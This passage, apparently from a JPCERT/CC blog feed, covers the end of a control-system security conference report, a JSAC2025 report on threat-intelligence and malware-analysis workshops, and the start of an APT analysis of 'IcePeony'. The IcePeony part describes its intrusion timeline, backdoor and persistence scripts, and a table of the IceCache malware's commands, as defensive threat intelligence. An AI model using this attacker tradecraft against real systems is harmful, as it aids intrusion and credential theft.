in preparation and execution?</p> <ul> <li>From my control-system experience there are many differences. In particular, during an incident, forensics and recovery involve far more on-site work than in IT, and the response must also take safety and environmental impact into account, so exercise preparation has to anticipate that.</li> </ul> <p>This exercise effort, the participation and roles of the control-system SIRT and other in-house stakeholders, and the insights gained seemed to strongly engage the audience, and many questions beyond the themes above were raised.<br><br><img class="asset asset-image at-xid-3640596 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_06-640wri.png" alt="荒木 一匡, JFE Steel Corporation, and 河野 一之, Senior Analyst, Control System Security, Domestic Coordination Group, JPCERT/CC" width="640" height="330"><br></p> <p></p> <h3>Get ready for SBOM! The painful SBOM operations a critical infrastructure operator faced, and how it coped</h3> <p><strong>Speaker:<br>西野 卓也, Technology Department, Innovation Center, NTT Communications Corporation</strong><br><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_06_NTT_COMMUNICATIONS.pdf" target="_blank" rel="noopener">Slides</a></p> <p data-sourcepos="141:1-144:346">Mr 西野's talk covered why SBOMs came to be seen as important, the concept and its purposes, and their operation and the measures taken.<br><br>He described the cyber attack that abused the update mechanism of SolarWinds products, one of the events that brought SBOMs to prominence, and explained that SBOMs came to be demanded as a way to make visible the components built into a software product, like an ingredients label on food. Current uses of SBOMs include "license management", "vulnerability management" and "policy and compliance management" as well as securing the software supply chain. He also noted that legal measures in Japan and elsewhere, such as the Pharmaceuticals and Medical Devices Act and US executive orders, require SBOMs to be provided. In particular, under the EU's Cyber Resilience Act (CRA), which is attracting attention, making a self-declaration of conformity will in practice likely require the use of SBOMs.</p> <p data-sourcepos="146:1-148:170">Although the need for SBOMs is proclaimed from many directions, there is little operational experience within companies and things are still at the trial-and-error stage. He explained six operational issues in detail: 1. SBOM formats, 2. SBOM generation tools, 3. SBOM identity, 4. SBOM generation methods, 5. security response, 6. security management. He also emphasised that a proper SBOM cannot be generated unless one anticipates who will ultimately use it and for what purpose (for example, identifying the OSS in the software the organisation uses), reaches agreement among stakeholders from the development stage, and develops the software so that an SBOM serving that purpose is easy to generate.</p> <p data-sourcepos="150:1-151:315">When a proper SBOM can be generated, it brings benefits such as a cross-cutting view of vulnerabilities in the OSS used across the organisation, but he also noted a management caveat: the conditions under which an SBOM was generated must be managed together with the SBOM itself. As an example of SBOM-based vulnerability management, he introduced the company's use of SBOMs together with SSVC to manage appliances in manufacturing, showing that vulnerability detection and prioritisation can be handled mechanically and realistically.<br><br><img class="asset asset-image at-xid-3646916 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_07_1-640wri.png" alt="西野 卓也, Technology Department, Innovation Center, NTT Communications Corporation" width="640" height="328"><br></p> <p></p> <h3><strong>Panel session: Towards an asset management method fit for vulnerability handling</strong></h3> <p><strong>Speakers and panellists:<br>越智 直紀, Assistant Manager, Security Development Department, Platform Development Center, Development Division, Panasonic Automotive Systems Co., Ltd.<br>田中 哲也, Manager, IT Governance Department, Digital Transformation Division, NSK Ltd.<br><br>Facilitator:<br>河野 一之, Senior Analyst, Control System Security, Domestic Coordination Group, JPCERT Coordination Center</strong><br><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_07_JPCERTCC.pdf" target="_blank" rel="noopener">Slides</a></p> <p data-sourcepos="162:1-163:259">One of the obstacles to vulnerability handling is how to manage assets from a security perspective. In this session Mr 越智 and Mr 田中 presented the results of their work on a suitable management method and the remaining issues, followed by a panel discussion among three panellists including the two of them.</p> <p data-sourcepos="165:1-167:18">JPCERT/CC first spoke about current problems in vulnerability handling. More organisations now recognise the importance of control system security and are taking action, including collecting vulnerability information. However, a considerable number of control system user organisations collect vulnerability information but are not able to make full use of it.</p> <p data-sourcepos="169:1-177:108">Mr 越智 then explained the background: when several manufacturing organisations tried to match control-system vulnerability information against their own assets, it emerged that their asset management was not adequate for matching. Guides already exist that list asset management as something that "should be done" for security, but the crucial question of how to do "asset management from a security perspective" suitable for vulnerability handling, in terms of approach and concrete procedures, is left to each organisation, so the practitioners responsible for control system security, such as control-system SIRTs, are feeling their way. He then described the asset management approach worked out this year with security staff from several manufacturers in the ICS security practitioner community. Specifically, since the purpose of vulnerability handling is to reduce "business damage risk", one approach to asset management from that perspective uses the importance of each asset under an assumed business impact as the axis for judgement, and the group studied a management method on that basis. Organising assets this way lowers the initial hurdle of having to collect information on every asset, lets organisations start with the assets that matter most for reducing business impact, and reduces the workload on practitioners, making it a realistic method.</p> <p data-sourcepos="179:1-186:249">Mr 田中 then explained that the method has four processes, "Process I (rating the importance of businesses and operations)", "Process II (rating the importance of assets)", "Process III (assigning security requirements)" and "Process IV (matching against vulnerability information)", and described in detail, with the asset management sheet format, the procedures for Processes I and II, which were the focus this year. In Process I the importance of each business and operation is rated on the basis of business risk; because the weighting of each business risk, such as how large a business impact it would have, differs from operator to operator, the work proceeded using cases recognised as risks both by the three industries taking part and by organisations from other industries in the ICS security practitioner community. In Process II, among the assets related to the businesses and operations rated highly in Process I, weightings based on the adverse effects expected if the asset malfunctions are set to rate each asset's importance. He also shared, drawing on the asset information collection under way in his own organisation, some of the techniques used to get site staff to report asset information properly.</p> <p data-sourcepos="188:1-189:45">After the presentations, with JPCERT/CC as facilitator, Mr 越智 and Mr 田中 answered questions on the following themes. The summary is as follows.</p> <p>● How was it to actually try the asset management method presented?</p> <ul> <li style="box-sizing: border-box;"><span style="box-sizing: border-box;">Rather than simply collecting asset information automatically with a tool, the method of assuming business risk gave us many insights, because control system assets are points of contact with the physical world.</span></li> <li>We had not organised assets in terms of business risk, so we want to incorporate this into our own asset management.</li> </ul> <p>● Do you think the vulnerability information you obtain can be matched against assets managed this way?</p> <ul> <li>When we tried matching vulnerability information, we were worried whether it would match the collected asset information, but it matched better than expected. However, there were variations in how assets were written, so preparing for matching remains an issue.</li> <li>We have a huge amount of asset information and expected matching it to be very hard, but narrowing the scope as in this method turned out to make matching easier.</li> </ul> <p>● Do you feel the asset management presented will let you proceed properly with vulnerability handling?</p> <ul> <li>I think it will make things easier. We cannot grasp everything at once, so it is important to iterate with this method and build up know-how.</li> <li>I think it is an effective approach. Such efforts are impossible without cooperation from the sites, and as a practitioner I want maximum effect for minimum effort. Also, because it is based on business risk, it becomes easier to explain to management why a given vulnerability is not being addressed, which I also consider effective.<br><br></li> </ul> <p><img class="asset asset-image at-xid-3640598 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_08-640wri.png" alt="越智 直紀, Panasonic Automotive Systems Co., Ltd.; 田中 哲也, NSK Ltd.; 河野 一之, JPCERT/CC" width="640" height="330"></p> <h2>&nbsp;</h2> <h3>Closing remarks</h3> <p><strong>椎木 孝斉, Director, JPCERT Coordination Center</strong></p> <p data-sourcepos="209:2-209:61">The closing remarks were given by JPCERT/CC director 椎木.</p> <p data-sourcepos="211:1-212:394">The conference, which began in 2009 and reached its 17th edition, brought back the in-person venue for the first time in five years in a hybrid format, and he first asked participants for feedback on that format. He noted that industry interest in control system security has changed greatly since the conference began in 2009, with more people involved and the subject becoming more familiar, and that in this situation it is essential for multiple organisations, including JPCERT/CC, to cooperate and work together.</p> <p data-sourcepos="214:1-214:615">He added that the conference has been planned with the idea of delivering something that leads to the next step, so that practitioners can cooperate and progress step by step even when the challenges are large, and asked participants to use the conference as a means towards the next action in their own efforts, before closing with thanks to the speakers and all participants.<br><br><img class="asset asset-image at-xid-3646918 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_09_1-640wri.png" alt="椎木 孝斉, Director, JPCERT Coordination Center" width="640" height="328"></p> <p></p> <h3>Closing</h3> <p>This Control System Security Conference offered talks on the control system security landscape from many standpoints: international standards, control system vendors, security vendors and user companies. We hope it will be of use to everyone involved with control systems in their future activities. We will continue to improve the programme and to share information and knowledge that helps raise control system security in Japan.</p> <p>Thank you for reading this report on the Control System Security Conference 2025.</p> <p>We look forward to seeing you at the next one.</p> <p style="text-align: right;">Domestic Coordination Group, 織戸 由美</p>
  52. JSAC2025 Report: Workshop & Lightning Talk

    Wed, 12 Mar 2025 04:00:00 -0000

    <p>Following the second installment, which covered the Main Track of JSAC2025 Day 2, this third installment introduces the Workshop and Lightning Talk sessions held at JSAC2025.</p> <h1>Workshop</h1> <h2>Handling Threat Intelligence: Techniques of Consuming and Creating Threat Intelligence</h2> <p><strong>Speakers: Tokio Marine Holdings 石川 朝久, 大徳 達也, 富山 寛之</strong> <br /> <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_ws1_ishikawa_daitoku_tomiyama_jp.pdf">Presentation slides (Japanese)</a></p> <p>Ishikawa, Daitoku, and Tomiyama gave a systematic explanation of threat intelligence, from its fundamentals to practical ways of using it, and ran a hands-on workshop on applying threat intelligence in practice.</p> <p>They began with the basic concepts of threat intelligence. A threat is characterized by three elements, "intent × capability × opportunity", and intelligence can be viewed from two perspectives: as a data format and as a process. They also explained that effective threat intelligence must satisfy four requirements: it must be Accurate, Audience Focused, Actionable, and delivered with Adequate Timing.</p> <p>Next, as practical approaches, they described Tactical Intelligence and Operational Intelligence in detail. Tactical Intelligence is intelligence for SOC staff, and the speakers explained prevention, detection, and response using IoCs. Specifically, they presented a systematic workflow that starts with collection through OSINT and SIGINT, proceeds to evaluating, analyzing, and enriching the collected IoCs, and ends with applying and distributing YARA and Sigma rules. They also discussed the usefulness and limitations of IoCs as follows: IoCs can prevent and discover industry-specific threats that have not yet been turned into signatures, but their freshness is short, on the order of hours to days, and their effectiveness fades over time; therefore automation through scripts that take the volume and freshness of IoCs into account is important, and IoCs must be used with a correct understanding of their context.</p> <p>Operational Intelligence is intelligence for security architects, administrators, and SOC staff, and the speakers explained how to gain a comprehensive understanding of attacker profiles and attack techniques and apply it to improving an organization's security. They covered analyzing TTPs with the MITRE ATT&amp;CK framework and systematizing defensive techniques with the MITRE D3FEND framework. Using threat intelligence about attack techniques, they described how to build a Defensive Architecture based on the principle "prevent what can be prevented, detect what cannot be prevented, and hunt for what cannot be detected". They also explained a systematic threat analysis process: collect information through OSINT and SIGINT, analyze it to create threat scenarios, and apply those scenarios to Purple Teaming and Threat Hunting. On Threat Hunting, a method for proactively finding threats that evade existing security controls, they stressed the importance of building verifiable hypotheses from four viewpoints: Hypothesis, Object (what to investigate), Procedure (how to investigate), and Evaluation (criteria for judgment). Furthermore, they introduced Summit The Pyramid (the STP theory), which improves the robustness of detections, and explained a methodology for evaluating and improving detection rules in terms of both accuracy (high precision and recall) and resilience (resistance over time to attackers' evasion).</p> <p>Finally, they explained the importance of sharing threat intelligence. In particular, because there are limits to what a single organization can collect on its own, sharing information through intelligence communities is important. They also touched on appropriate sharing using TLP and on expressing the confidence of intelligence using Confidence Levels and Estimative Language.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_workshop1_1-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642403 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_workshop1_2-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642405 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <h2>Malware config extraction at scale – building malware analysis pipelines</h2> <p><strong>Speaker: CERT Polska Michał Praszmo</strong> <br /> <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_ws2_micha%C5%82-praszmo_en.pdf">Presentation slides (English)</a></p> <p>Praszmo ran a workshop on the tools for automatically extracting malware configuration that were developed over many years of malware analysis projects at CERT Polska.</p> <p>He began with MWDB, a repository for malware analysis. MWDB is a highly extensible system designed with automated analysis in mind: it has core object types for storing malware samples, configurations, and other data; secondary objects such as tags, comments, and attributes that can be attached to them; and flexible search using Lucene queries. Automation is also possible through the CLI, the Python API, and the REST API.</p> <p>Next, he explained malduck, a Python module for malware analysis. malduck provides commonly used analysis helpers such as cryptographic functions, compression algorithms, handling of memory dumps and PE/ELF files, and a configuration extraction engine. As the concrete extraction mechanism, he explained pattern matching with YARA rules and extracting the malware's characteristic information, such as C2 server URLs, from the matched locations.</p> <p>Finally, he introduced Karton, a distributed malware processing framework. Karton is a framework for building analysis pipelines that combine MWDB and malduck. Each service performs its own role, so tasks such as classifying malware, unpacking archives, and extracting configurations can be carried out automatically. As an example of real-world use, he mentioned that it is also used for purposes other than malware analysis, such as analyzing phishing reports.</p> <p>The hands-on part consisted of exercises that started with the basics of MWDB and progressively deepened the participants' understanding of the tools. Specifically, participants worked through practical exercises following realistic malware analysis scenarios: filtering malware by tags, viewing sample details and understanding the hierarchical structure, searching for similar configurations, and handling blobs.</p> <p>The tools are published in the following GitHub repositories. <br /> MWDB:<a href="https://github.com/CERT-Polska/mwdb-core" title="">https://github.com/CERT-Polska/mwdb-core</a> <br /> Malduck:<a href="https://github.com/CERT-Polska/malduck" title="">https://github.com/CERT-Polska/malduck</a> 
<br /> Karton:<a href="https://github.com/CERT-Polska/karton" title="">https://github.com/CERT-Polska/karton</a></p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_workshop2-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642406 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <h2>An Introduction to Analyzing Malware Anti-Analysis Features Using IDA and Ghidra Plugins</h2> <p><strong>Speaker: LAC Co., Ltd. 武田 貴寛</strong> <br /> <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_ws3_takeda_For_IDA_User_en.pdf">Presentation slides for IDA users (English)</a> <br /> <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_ws3_takeda_For_Ghidra_User_en.pdf">Presentation slides for Ghidra users (English)</a></p> <p>Takeda ran a workshop on AntiDebugSeeker, a tool that automatically identifies anti-debugging features contained in malware.</p> <p>He began by explaining that when analysis is carried out with a specific goal, such as identifying communication destinations, encountering an anti-debugging feature midway can stop the analysis and make the goal hard to achieve. AntiDebugSeeker was developed to address this problem; the tool prevents analysis from being interrupted and helps the analyst continue efficiently.</p> <p>Next, he described AntiDebugSeeker's main features: extracting anti-debugging APIs that malware may use, and, using keywords as triggers, extracting anti-debugging features that cannot be identified from API calls alone. He also noted that, for packed malware, running the tool after unpacking and repairing the import address table gives more effective results.</p> <p>He then demonstrated how to use AntiDebugSeeker on real malware. The detected items shown in the tool's results include information related to memory operations and the identification of functions that have anti-debugging features. He also explained features that make analysis more efficient, such as jumping from a detection result to the corresponding function and viewing the details of the detection rule.</p> <p>The hands-on part started with analyzing basic anti-debugging features, moved on to analyzing combined anti-analysis features, and then to detailed analysis of process behavior. Using malware's detection of VMware environments as an example, participants also practiced customizing AntiDebugSeeker's configuration file to implement new detection rules.</p> <p>Finally, he showed that the tool's highly customizable detection rules make it possible to respond to new anti-analysis techniques and to add original detection rules.</p> <p>The tool is published in the following GitHub repositories. <br /> IDA version:<a href="https://github.com/LAC-Japan/IDA_Plugin_AntiDebugSeeker" title="">https://github.com/LAC-Japan/IDA_Plugin_AntiDebugSeeker</a> <br /> Ghidra version:<a href="https://github.com/LAC-Japan/Ghidra_AntiDebugSeeker" title="">https://github.com/LAC-Japan/Ghidra_AntiDebugSeeker</a></p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_workshop3-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642407 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <h1>Lightning Talk</h1> <h2>Introducing a Tool for Utilizing MITRE ATT&amp;CK with Multiple LLM Agents and RAG</h2> <p><strong>Speaker: 佐田 淳史</strong> <br /> <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_LT1_sada.pdf">Presentation slides (English)</a></p> <p>Sada spoke about using LLMs in the security field, focusing on "disarmBot", a tool developed around the MITRE ATT&amp;CK framework. disarmBot is built on AutoGen, Microsoft's open-source AI agent framework, and is implemented as a system in which multiple AI agents work cooperatively.</p> <p>He first discussed the importance of using LLMs in security and incident response, given the rapid recent progress of LLM and AI technology.</p> <p>Next, he explained the characteristics of the AutoGen framework. AutoGen has three execution patterns (Two Agent Chat, Sequential Chat, and Group Chat); the tool adopts Group Chat mode so that multiple agents can discuss a problem from many angles.</p> <p>As the core of the disarmBot system, he built a cooperative system of the following five specialized agents.</p> <ol> <li>Attacker Side: analyzes from the attacker's perspective, referring to the Red team TTPs</li> <li>Defender Side: analyzes from the defender's perspective, referring to the Blue team TTPs</li> <li>OSINT Specialist: collects and summarizes information from the internet for the discussion</li> <li>Skeptics: takes a critical view of the other agents' statements</li> <li>Solution Architect: integrates the agents' information and presents the final solution</li> </ol> <p>Regarding disarmBot's technical implementation, he explained the DISARM TTP framework. This framework follows the design philosophy of MITRE ATT&amp;CK and was developed to describe and understand disinformation incidents. It is organized hierarchically into phases, tactics, techniques, tasks, and countermeasures, and is a comprehensive framework that includes both Red team and Blue team perspectives. <br /> To make effective use of this framework, disarmBot adopts an architecture that integrates the following elements.</p> <ul> <li>Efficient information retrieval using RAG (Retrieval-Augmented Generation)</li> <li>A vector database built with Chroma DB</li> <li>Use of the DISARM TTP framework documentation</li> <li>Use of the OpenAI API or the Azure OpenAI API</li> <li>An operating environment on the Discord platform</li> </ul> <p>Finally, he emphasized that users are responsible for the answers the bot generates. He also noted that a tool built with this proactive approach could be applied to other uses, such as penetration testing and DFIR, by swapping out the database and prompts.</p> <p>The tool supports Japanese, English, and Chinese and is published in the following GitHub repository. <br /> <a href="https://github.com/ultra-supara/disarmBot" title="">https://github.com/ultra-supara/disarmBot</a></p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_LT1-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642399 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <h1>International Cooperation between Japan and Spain in the Field of Cybersecurity</h1> <p><strong>Speakers: Canon IT Solutions 池上 真人, ESET Spain Josep Albors</strong> <br /> <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_LT2_masato_josep.pdf">Presentation slides (English)</a></p> <p>Ikegami and Albors spoke about the commonalities between cyberattacks in Japan and Spain, two geographically distant countries, and about cooperation between the two.</p> <p>They began with trends in information-stealing malware observed in both countries. Many attack campaigns occur in both countries at almost the same time, and in Spain a characteristic peak is observed in mid-November. They explained that this is because events such as the Christmas shopping season and Black Friday are more popular there than in Japan, so malware operators time their campaigns to target them.</p> <p>Next, they presented Emotet as an example of information-stealing malware that was rampant in both countries. Emotet spread mainly by email. Sharing documents as password-protected ZIP files (PPAP) was thought to be a uniquely Japanese practice, but attacks abusing it have also been confirmed in Spain.</p> <p>Regarding scam sites, they noted that these are often detected first in Spain, which they attributed to the size of the Spanish-speaking internet population and to localization costs.</p> <p>They also touched on tech support scams. In Spain these have been observed since 2012; at first they were basic Spanish-language websites, but later tech support scams that make phone calls in English or Spanish were also confirmed. Recently the tactics have become more sophisticated by combining several techniques. Tech support scams similar to those observed in Japan have also been confirmed in Spain.</p> <p>Finally, the two speakers emphasized the importance of international threat intelligence sharing. As concrete examples, they introduced the cooperation agreement between JPCERT/CC and INCIBE concluded in February 2024 and threat information sharing using MISP. They stressed the importance of strengthening cybersecurity measures through international cooperation while taking regional circumstances into account.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_LT2_1-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642400 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_LT2_2-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642401 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <h1>Award Winners</h1> 
<p>At JSAC2025, awards are given to the sessions that shared particularly valuable information among those presented. The Excellent Presentation Award (formerly the Best Speaker Award) goes to the session that received the highest proportion of "Excellent" (very satisfied) ratings in the participant survey. The Special Recognition Award is decided by discussion among the CFP review board. The presentations selected for the Excellent Presentation Award and the Special Recognition Award are as follows.</p> <p><strong>Excellent Presentation Award</strong> <br /> Title: Hack The Sandbox: Unveiling the Truth Behind Disappearing Artifacts <br /> Speakers: ITOCHU Cyber &amp; Intelligence Inc. 亀川 慧, 笹田 修平, 丹羽 祐介 </p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_epa-640wri.jpg" width="543" height="360" alt="" class="asset asset-image at-xid-3642398 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <p>This presentation was recognized for its high practical value, presenting research findings on countermeasures and investigation methods against the latest threats.</p> <p>Comment from the award winners</p> <pre style='padding: 10px 10px; white-space: pre-wrap; width: 650px;color:#1F1F1F;background:#d1d1d1;overflow: auto;'> Attackers constantly try to stay one step ahead of us. As a blue team, we must accept that harsh reality and keep defending through trial and error. This presentation shares only the knowledge we have gained so far and does not claim to offer a perfect answer. However, the attitude of tackling problems persistently and doggedly pursuing answers through unglamorous work is the foundation that supports front-line security. The topic we took up also contained many unknowns, but we formulated hypotheses from multiple angles, carefully verified them one by one while tracing the attackers' footsteps, and repeatedly discussed investigation methods and countermeasures. We are truly honored that these results have been so highly appreciated. In the field of cybersecurity, individual knowledge and effort matter, but pooling our wisdom and working together matters most of all. Many insights and clues that are easy to overlook may be hidden all around us. Not missing those signs and gaining insight from them can lead to major discoveries and may be the "key" to deriving new countermeasures. We believe that analysts sharing such small "seeds" with each other and deepening their mutual understanding is the very purpose of JSAC, and that this in turn will improve cybersecurity for society as a whole. </pre> <p><strong>Special Recognition Award</strong> <br /> Title: Observation of Phishing Groups Involved in Fraudulent Remittances and Mizuho's Countermeasures <br /> Speakers: Mizuho Financial Group, Inc. 八子 浩之, 竹内 司, 遠藤 拓也 </p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_sra-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642402 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <p>This presentation was recognized for the many lessons it offered as a case study of countermeasures by an organization targeted by phishing attacks, something that has rarely been made public.</p> 
<p>Comment from the award winners</p> <pre style='padding: 10px 10px; white-space: pre-wrap; width: 650px;color:#1F1F1F;background:#d1d1d1;overflow: auto;'> 八子 浩之: I would like to express my heartfelt gratitude to everyone for this honorable award on the wonderful stage of JSAC. I consider it the result of work done together with the many members who supported us. We intend to continue, with renewed determination, our joint defense efforts with organizations that face the same challenges against phishing. 竹内 司: I am grateful for the opportunity to present on the public stage of JSAC and for receiving this valuable award. Although three of us gave the presentation, we reached this point thanks to the cooperation of many team members and related departments, and I would like to thank everyone involved once again. The threat of cybercrime, not only phishing, continues to grow, and we will keep contributing actively to crime prevention in this field. 遠藤 拓也: I have attended JSAC as a listener since its first edition and always hoped to present some day. I am very honored that this wish has come true and that we have received such an honorable award. This achievement was possible only through the cooperation and support of everyone on our team, and I sincerely thank the members I worked with. We will continue our unceasing efforts in countering phishing, and we look forward to your continued guidance and support. </pre> <p>JSAC also inducts into its Hall of Fame those who have continued outstanding presentation activities over a long period. Hall of Fame induction is a special award honoring speakers who have received the Excellent Presentation Award or the Special Recognition Award three times in total. Inductees are <strong>granted permanent participation rights to JSAC</strong>. The inductee at JSAC2025 is as follows.</p> <p><strong>Hall of Fame</strong> <br /> Inductee: ITOCHU Cyber &amp; Intelligence Inc. 笹田 修平</p> <p>Comment from the inductee</p> <pre style='padding: 10px 10px; white-space: pre-wrap; width: 650px;color:#1F1F1F;background:#d1d1d1;overflow: auto;'> I am deeply honored to be inducted into the Hall of Fame, and I would like to take this opportunity to express my sincere thanks. I feel this is entirely thanks to the colleagues who have walked alongside me and everyone who has supported me. With this gratitude in mind, I will continue to work hard, and I look forward to your continued support. </pre> <h1>Closing</h1> <p>Finally, I would like to take this opportunity to thank everyone who participated in JSAC2025 and everyone who read this report.</p> <p>                                         Early Warning Group, 石原 大移紀</p>
  53. IcePeony with the ‘996’ work culture

    Wed, 16 Oct 2024 15:00:00 -0000

    This blog post is based on “IcePeony with the ‘996’ work culture” that we presented at VB2024. We are grateful to Virus Bulletin for giving us the opportunity to present. https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/

tl;dr

We have discovered a previously unknown China-nexus APT group, which we have named “IcePeony”. Due to operational mistakes, they exposed their resources, allowing us to uncover details of their attacks.

- IcePeony is a China-nexus APT group that has been active since at least 2023. They have targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam.
- Their attacks typically start with SQL Injection, followed by compromise via webshells and backdoors. Interestingly, they use a custom IIS malware called “IceCache”.
- Through extensive analysis, we strongly believe that IcePeony is a China-nexus APT group, operating under harsh work conditions.

IcePeony

IcePeony is an unknown attack group. Our research shows that they have been active since at least 2023. They mainly target Asian countries, such as India and Vietnam. In the log files we analyzed, there were over 200 attempts to attack various government websites in India.

They use SQL injection attacks on public web servers. If they find a vulnerability, they install a webshell or malware. Ultimately, their goal is to steal credentials.

We believe IcePeony works for China’s national interests. It is possible that they prioritize China’s maritime strategy.

Our research found that IcePeony targeted government and academic institutions in India, political parties in Vietnam, and government institutions in Mauritius. Recently, they may have also attacked Brazil. It is likely that they will expand their targets in the future.

OPSEC fail

In July, we identified a host that was publicly exposing various attack tools, including CobaltStrike and sqlmap, via an open directory.
What made this discovery even more compelling was the presence of a zsh_history file.

One of the most interesting findings was the zsh_history file. Similar to bash_history, the zsh_history file records command history. However, zsh_history also logs timestamps, allowing us to pinpoint the exact time each command was executed. This enabled us to construct a highly detailed timeline of the attack.

Unlike a typical timeline created by an IR or SOC analyst, this one offers insight from the attacker’s perspective. We could observe their trial-and-error process and how they executed the intrusion.

The zsh_history was not the only interesting file. There were many others. For example, IcePeony had configured several helper commands in their alias file, including shortcuts to simplify lengthy commands and commands to quickly access help information.

Here is an example with Mimikatz. By typing “hPass,” the attacker could display basic tutorials for Mimikatz. This improved their effectiveness during attacks.

Intrusion Timeline

We obtained two weeks’ worth of command history from the zsh_history. Let’s go through the events of each day.

On day-1, the attacker attempted SQL injections on several government websites. When the exploit succeeded, they installed a webshell or IceCache, establishing a foothold for the attack. On day-2, they reviewed the domain information of compromised hosts and created accounts for further exploitation. On day-3, which was a Sunday, they did not perform any actions. It seems the attacker does not work on Sundays. On day-4, they used IceCache to configure proxy rules. We will explain this in more detail later. On day-5, the attacker expanded their reach by attempting more SQL injections on other government websites. On day-6, they used various tools, including IcePeony’s custom tool called StaX and a rootkit called Diamorphine.
On day-7, they continued to attack other hosts using tools like URLFinder and sqlmap. On day-8, they used IceCache to steal information from the compromised environment, especially focusing on domain users. On day-9, they were quiet and only performed connection checks. On day-10, they did nothing since it was a Sunday. On day-11, they used tools like craXcel and WmiExec. They used craXcel, an open-source tool, to unlock password-protected Microsoft Office files. On day-12, they used IceCache to add proxy rules and set persistence with scheduled tasks. On day-13 and day-14, they explored other hosts for further exploitation.

Over the course of two weeks, the attacker utilized a variety of tools and commands to compromise government websites and exfiltrate information.

Tools

IcePeony uses a wide range of tools, with a particular preference for open-source ones. Here, we will highlight only the most distinctive tools they use.

StaX

StaX is a customized variant of the open-source tool Stowaway, a high-performance proxy tool. The attacker enhanced Stowaway with custom processing. Based on development strings, we called this version StaX. StaX included encryption for communication targets specified in active mode using Custom Base64 and AES.

ProxyChains

ProxyChains is an open-source proxy tool. The attacker used ProxyChains to run script files on victim hosts.

info.sh is a script that collects system information from the compromised environment. It gathers environment information, user information, installed tool versions, network settings, SSH configuration files, and command history.

linux_back.sh is a script for backdoors and persistence. It downloads and runs a backdoor shell script from the server and creates backdoor users.

Interestingly, they installed a rootkit called Diamorphine, which is available on GitHub.

Malware

The IcePeony server contained malware targeting IIS, which we named IceCache. They used IceCache to attack the server exposed on the attack surface.
Additionally, during the investigation, we discovered another related malware, which we called IceEvent. No logs of IceEvent being used were found, but we believe it was used to compromise another computer that was not connected to the internet.

IceCache

IceCache is an ELF64 binary developed in the Go language. It is customized based on the open-source software reGeorge. To facilitate their intrusion operations, they added file transmission commands and command execution functionality. The IceCache module is installed and run on IIS servers. The number of commands changes, but the samples are classified into two types based on their authentication tokens.

We found files with remaining PDB information. These files were developed by a user named “power” in a project called “cachsess”.

PDB Path
C:\Users\power\documents\visual studio 2017\Projects\cachsess\x64\Release\cachsess.pdb
C:\Users\power\Documents\Visual Studio 2017\Projects\cachsess\Release\cachsess32.pdb

The number of commands changes over time, but it includes command execution functions, SOCKS proxy functions, and file transmission functions.
TYPE-A | Description
--- | ---
EXEC / EXEC_PRO | Command to execute a process
SOCKS_HELLO | SOCKS protocol initial handshake message
SOCKS_CONNECT | Command to indicate a connection request with the SOCKS protocol
SOCKS_DISCONNECT | Command to indicate disconnection with the SOCKS protocol
SOCKS_READ | Command to read data in the SOCKS protocol
SOCKS_FORWARD | Command to instruct data transfer via the SOCKS protocol
PROXY_ADD | Command to add a proxy
PROXY_LIST | Command to list proxies
PROXY_DEL | Command to delete a proxy
PROXY_CLEAR | Command to clear all proxy settings
PROXY_SET_JS | Set the JavaScript
PROXY_GET_JS | Get the set JavaScript
PROXY_ALLOW_PC | Allowed PC settings
PROXY_CACHE_CLEAR | Command to clear the proxy cache
PROXY_CACHE_TIME | Command to set the proxy cache time
FILE_UPLOAD | Upload files
FILE_DOWNLOAD | Download files

TYPE-B | Description
--- | ---
EXEC / EXEC_PRO | Command that directs the execution of a process
SOCKS_HELLO | SOCKS protocol initial handshake message
